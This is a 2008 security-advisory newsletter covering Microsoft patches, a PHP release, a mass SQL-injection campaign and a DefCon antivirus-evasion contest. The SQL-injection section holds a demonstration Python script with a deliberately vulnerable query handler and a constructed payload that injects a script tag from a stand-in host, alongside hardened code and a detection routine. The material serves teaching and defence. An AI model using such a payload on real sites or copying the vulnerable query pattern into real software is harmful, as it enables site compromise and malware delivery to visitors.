Advisory #255 - Microsoft (Multiple), Multiple News

Sûnnet Beskerming Alert List Advisory #255
You are receiving this message because you have subscribed to our Information Security Alert Mailing List, or have been selected for a specific one-off copy. If you believe that you are receiving this message in error, please contact info@... to resolve the error.

Why not upgrade to get same-day notification of security threats? Details and rates are available online (http://www.beskerming.com/premium/generic_advisory.html). Why not go the next step and get delivery tailored just for your company? (http://www.beskerming.com/premium/focussed_advisory.html)

Contents
--------------------------------------------------------------------
1. SECURITY
--------------------------------------------------------------------
1.1 Microsoft (Multiple) - Remote Hacker Automatic Control - Time Since Discovery - 2 days
=======================================
/*
 - Remote or Local - Can it be achieved through a network, or does it require physical access?
 - Hacker - The bad guy
 - Manual or Automatic - Does the vulnerability need to be manually performed, or can it be automated?
 - Control, Denial of Service or Data Theft - Will the hacker get control of your system / website, will they prevent you from using it, or will they steal data?
*/
--------------------------------------------------------------------
2. NEWS
--------------------------------------------------------------------
2.1 PHP Updates to 5.2.6
2.2 Mass Site Hack Proves No Site Is Truly Safe
2.3 DefCon Competition Has Antivirus Vendors Complaining
=====================================

1. SECURITY

1.1 Microsoft (Multiple) - Remote Hacker Automatic Control

-- Products Affected --
Microsoft Office (Word, Publisher)
Microsoft Windows (Jet Database Engine)
Microsoft antimalware products (Malware Protection Engine)

-- Technical Description --
MS08-026 - Word. Multiple remote code execution. Replaces MS08-009. Critical
MS08-027 - Publisher. Remote code execution. Replaces MS07-037 and MS08-012. Critical
MS08-028 - Jet Database Engine. Remote code execution. Critical
MS08-029 - Microsoft Malware Protection Engine. Multiple denial of service. Important

-- Description --
Microsoft has provided four patches with the May Security Update release, the first three rated Critical and the remaining one Important. MS06-069 was also re-released to add Windows XP SP3 as an affected product. The Jet Database Engine vulnerability (MS08-028) has been actively exploited for some time, whereas no attack code has been publicly released for the other vulnerabilities. Note that the Malware Protection Engine (MS08-029) normally updates itself through the product's own definition-update mechanism rather than through Windows Update, so check the engine version in each antimalware product separately.

-- Recommended Action --
All users and administrators should apply the updates at the earliest opportunity.

-- Source --
http://www.microsoft.com/technet/security/bulletin/ms08-may.mspx
http://www.beskerming.com/premium/patch_pack.html
http://store.eSellerate.net/s.asp?s=STR3448907936&Cmd=CATALOG&CategoryID=9811

-- Updates Available --
http://www.microsoft.com/technet/security/bulletin/ms08-026.mspx
http://www.microsoft.com/technet/security/bulletin/ms08-027.mspx
http://www.microsoft.com/technet/security/bulletin/ms08-028.mspx
http://www.microsoft.com/technet/security/bulletin/ms08-029.mspx

-- External Tracking Data --
CVE-ID: CVE-2008-1091 (MS08-026)
CVE-ID: CVE-2008-1434 (MS08-026)
CVE-ID: CVE-2008-0119 (MS08-027)
CVE-ID: CVE-2007-6026 (MS08-028)
CVE-ID: CVE-2008-1437 (MS08-029)
CVE-ID: CVE-2008-1438 (MS08-029)

-- Threat Matrix --
               U    O
Home User     10   10  (Highly Critical)
Corporate     10   10  (Highly Critical)
=======================================
/*
 Threat Matrix:
 U - User
 O - Operator
 Harmless - 0 ----- 10 - Highly Critical
*/
=======================================

2. NEWS

2.1 PHP Updates to 5.2.6

The PHP Group released version 5.2.6 of the popular scripting language earlier this month. While more than 100 bugs were fixed with this update, several critical security vulnerabilities were patched that make updating essential for any administrators or users currently running the 5.x branch of PHP (if you are still stuck on 4.x or earlier, you should seriously consider updating your installation).

Several memory leaks, buffer overflows, safe mode bypasses, and multi-byte character handling problems are amongst the issues addressed by this update, which is the first to be released in six months by the PHP Group. Although there are probably many more security vulnerabilities yet to be found or patched (see Stefan Esser's work, which has been somewhat quiet since the end of last year), the significant number of bugs patched is a continuing good sign from a project that has come under fire in the past for a mixed approach to the security of its main product.

2.2 Mass Site Hack Proves No Site Is Truly Safe

There has been a lot of coverage of a widespread set of web server attacks (estimated at more than half a million sites) that have been taking place for a number of weeks, using an unfortunately common SQL injection opportunity to take control of back end databases, and of the sites themselves. So much concern and confusion has surrounded what is going on that Microsoft's Security Response Center has released a statement to clarify the nature of the attacks as reported to them. Although a new IIS vulnerability was disclosed in recent weeks, the attacks only make use of poor site and database maintenance practices, using SQL injection to compromise sites. The injected SQL appends a script tag to content stored in the database, so that every page rendered from it carries the tag; for visitors to an affected site, that JavaScript tries to download and run malware that then targets a number of commonly used technologies in order to gain full control over the visitor's system. It goes to show that input validation is a critical component of the security picture for a site, and it is a problem that is still not being properly addressed by many sites, including many that should know better. If anything else is needed to concern site operators, it is research from David Litchfield that demonstrates an almost generic attack method against Oracle databases.
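The pattern described above, modelled as an added example that is not part of the advisory or of any affected site's code: a lookup handler that pastes a request parameter into SQL (the batch is run with sqlite3's executescript() to stand in for SQL Server's acceptance of stacked statements, which the real attacks relied on), the same handler hardened with allow-list validation plus a bound parameter, and an audit routine that walks every TEXT column of a table looking for script tags that load code from a host the site does not own. The table `pages`, the host `malware.example`, the payload string and the function names are all constructed for this demonstration.

```python
import re
import sqlite3

# Constructed stand-in for the attacker's script host; the real campaign
# rotated through several domains that this example does not reproduce.
ATTACKER_HOST = "malware.example"

# Constructed payload with the same shape as the real one: the expected
# integer, a statement terminator, then an UPDATE that appends a script tag
# to a content column. It only works if the server runs stacked statements.
PAYLOAD = (
    "1; UPDATE pages SET body = body || "
    "'<script src=\"http://%s/loader.js\"></script>'" % ATTACKER_HOST
)

# Captures the host of any <script src="http://host/..."> tag.
SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']?https?://([^/"\'>\s]+)', re.I)
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def setup_db():
    """Constructed content table standing in for a CMS back end."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        INSERT INTO pages VALUES (1, 'Home',  '<p>Welcome</p>');
        INSERT INTO pages VALUES (2, 'About', '<p>About us</p>');
        """
    )
    return conn


def lookup_vulnerable(conn, page_id):
    """Vulnerable handler: the query-string value is pasted into the SQL text.

    executescript() runs every statement in the string, which models the
    stacked-statement behaviour of SQL Server that the mass attacks relied
    on (sqlite3's execute() would reject the second statement). Returns the
    number of rows the batch modified; a lookup should never modify any.
    """
    before = conn.total_changes
    conn.executescript("SELECT title, body FROM pages WHERE id = " + page_id)
    return conn.total_changes - before


def lookup_hardened(conn, page_id):
    """Hardened handler: allow-list the shape of the input, then bind it.

    Either control alone stops this payload; doing both means a mistake in
    one of them does not hand the attacker the database.
    """
    if not re.fullmatch(r"[0-9]{1,9}", page_id):
        raise ValueError("page id must be a positive integer")
    return conn.execute(
        "SELECT title, body FROM pages WHERE id = ?", (int(page_id),)
    ).fetchone()


def find_foreign_scripts(conn, table, own_hosts):
    """Audit every TEXT column of `table` for script tags loading off-site code.

    Returns [(rowid, column, host)] for each tag whose host is not in
    own_hosts. `table` must be a trusted identifier; it is checked against a
    strict pattern because an identifier cannot be bound as a parameter.
    """
    if not IDENTIFIER.fullmatch(table):
        raise ValueError("bad table name")
    text_cols = [
        row[1]
        for row in conn.execute("PRAGMA table_info(%s)" % table)
        if (row[2] or "").upper() == "TEXT"
    ]
    hits = []
    for col in text_cols:
        rows = conn.execute("SELECT rowid, %s FROM %s ORDER BY rowid" % (col, table))
        for rowid, value in rows:
            for host in SCRIPT_SRC.findall(value or ""):
                if host.lower() not in own_hosts:
                    hits.append((rowid, col, host))
    return hits


if __name__ == "__main__":
    conn = setup_db()
    print("benign request changed rows:", lookup_vulnerable(conn, "1"))
    print("injected request changed rows:", lookup_vulnerable(conn, PAYLOAD))
    print("foreign scripts now in the database:",
          find_foreign_scripts(conn, "pages", {"www.example.org"}))
    try:
        lookup_hardened(conn, PAYLOAD)
    except ValueError as exc:
        print("hardened handler rejected the payload:", exc)
```

The audit routine is the part a site operator wants after a campaign like this: running it over every content table (with the site's own hostnames in own_hosts) shows whether the back end has already been seeded, and it catches the case the web logs do not, namely a tag that was injected weeks ago and has been served to every visitor since.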
In one simple set of attacks, previously trustworthy sites can no longer be considered trustworthy, and it is another blow to services that tout their ability to mark a site as 'Hacker Safe' or otherwise safe to visit (like SiteAdvisor).

2.3 DefCon Competition Has Antivirus Vendors Complaining

DefCon is known for a range of 'out there' activities and presentations, and it looks like this year will be no different. A contest being organised on the sidelines of this year's convention is already raising eyebrows and complaints from around the Information Security industry. In a nutshell, the aim of the contest is to modify malware samples so that they pass through a number of antivirus scanners without detection, while still retaining their malicious capability. It could be seen as a polymorphism competition: how much can you change the code and still retain the same function?

What the contest seeks to achieve is nothing more than what happens continuously on the Internet, where malware developers continually fine-tune their software to best avoid detection. It should also show up the antivirus tools that rely on poor signature detection mechanisms and those that use weak heuristics to detect previously unknown malware. The big problem for the antivirus developers is that it is possible to drive a truck through the holes in their systems, and it isn't going to take much for competitors to bypass most tools. It will be interesting to see how the competition organisers set about increasing the difficulty of each round. Antivirus developers are complaining about the competition, though most of the complaints sound as if the developers are having a hard time keeping their technology within spitting distance of the malware authors.

Even with the complaining, it probably won't take long for the competition samples to appear in definition files and in the count of malware types being detected. It is strange, though, that competitions like CTF, or the recent 0-day competition at CanSecWest, attract little complaint, but as soon as antivirus or antimalware tools are targeted it is too much for people. It is the latest in a number of interesting competitions where the practical attack value of what is being done is greater than in other competitions. This contest ranks alongside minuscule-XSS competitions and archives of XSS / SQL injection vulnerable sites.
=======================================
Sincerely,

Sûnnet Beskerming Team
info@...

Sûnnet Beskerming Pty. Ltd.
Adelaide, Australia
http://www.beskerming.com
Tel: +61 (0) 410 707 444

** Sûnnet Beskerming Pty. Ltd. **
Established in mid 2004, Sûnnet Beskerming Pty. Ltd. is the sister company to Jongsma & Jongsma Pty. Ltd., and was formed to develop and commercialise the research coming out of Jongsma & Jongsma Pty. Ltd. Sûnnet Beskerming Pty. Ltd. is an Information Security specialist and, in conjunction with the tools developed by Jongsma & Jongsma Pty. Ltd., provides total security solutions and services, from the perimeter to internal data stores, including web application security and security testing and analysis.

_______________________________________________
Alertmailinglist mailing list
Alertmailinglist@...
http://skiifwrald.com/mailman/listinfo/alertmailinglist_skiifwrald.com